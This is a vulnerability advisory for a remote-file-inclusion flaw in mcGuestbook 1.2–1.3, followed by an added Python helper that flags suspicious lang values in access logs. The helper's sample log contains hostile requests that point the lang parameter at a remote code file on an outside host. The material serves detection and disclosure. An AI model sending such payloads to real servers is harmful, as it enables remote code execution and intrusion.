PT-2006-4070 · Mcguestbook · Myco Guestbook
Sweet-Devil · Published 2006-06-23 · Updated 2018-10-18 · CVE-2006-3175
CVSS v2.0: 7.5 (High)
| Vector | AV:N/AC:L/Au:N/C:P/I:P/A:P |
Name of the Vulnerable Software and Affected Versions
mcGuestbook versions 1.2 through 1.3
Description
The issue allows remote attackers to execute arbitrary PHP code via a URL in the lang parameter to scripts such as "admin.php", "ecrire.php", and "lire.php". It is noted that the issue might be limited to a race condition during installation or to an improper installation, since a completed installation creates an include file that prevents external control of the lang variable.
Recommendations
For mcGuestbook versions 1.2 through 1.3, consider disabling access to the "admin.php", "ecrire.php", and "lire.php" scripts until a proper fix is applied, and ensure the installation is completed properly so that the lang variable cannot be controlled externally.
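As an added example (not part of this advisory or of mcGuestbook itself), the following Python helper applies the allow-list check a language selector should pass before being used in an include, and scans constructed access-log lines for requests to the three scripts named above whose lang value would fail that check; the hosts and paths in the sample log are assumptions.

```python
"""Detection helper for remote-file-inclusion attempts via the mcGuestbook
lang parameter. Added example; the log lines are constructed, the script
names come from the advisory, hosts and paths are made up."""
import re
from urllib.parse import parse_qs, urlsplit

# Scripts the advisory names as reading the lang parameter.
VULNERABLE_SCRIPTS = {"admin.php", "ecrire.php", "lire.php"}

# Assumption: a legitimate language selector is a short code such as
# "fr" or "fr_FR"; anything else (a URL, a path, a null byte) is rejected.
SAFE_LANG = re.compile(r"^[a-z]{2}(_[A-Z]{2})?$")

# Request line of a Common Log Format entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def is_safe_lang(value: str) -> bool:
    """Allow-list check a hardened script should apply before include()."""
    return bool(SAFE_LANG.match(value))


def suspicious_lang_values(log_text: str) -> list[tuple[str, str]]:
    """Return (script, lang value) pairs for requests to the vulnerable
    scripts whose lang parameter does not pass the allow-list."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        script = parts.path.rsplit("/", 1)[-1]
        if script not in VULNERABLE_SCRIPTS:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("lang", []):
            if not is_safe_lang(value):
                hits.append((script, value))
    return hits


# Constructed sample: one normal request, one with a URL in lang against
# lire.php, and one against a script the advisory does not mention.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jun/2006:10:01:02 +0000] "GET /guestbook/lire.php?lang=fr HTTP/1.1" 200 2048
203.0.113.8 - - [23/Jun/2006:10:01:05 +0000] "GET /guestbook/lire.php?lang=http://203.0.113.9/x.txt HTTP/1.1" 200 310
203.0.113.8 - - [23/Jun/2006:10:01:09 +0000] "GET /guestbook/index.php?lang=http://203.0.113.9/x.txt HTTP/1.1" 200 500
"""

if __name__ == "__main__":
    for script, value in suspicious_lang_values(SAMPLE_LOG):
        print(f"RFI attempt against {script}: lang={value}")
```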
Weakness Enumeration
Code Injection
Affected Products
Myco Guestbook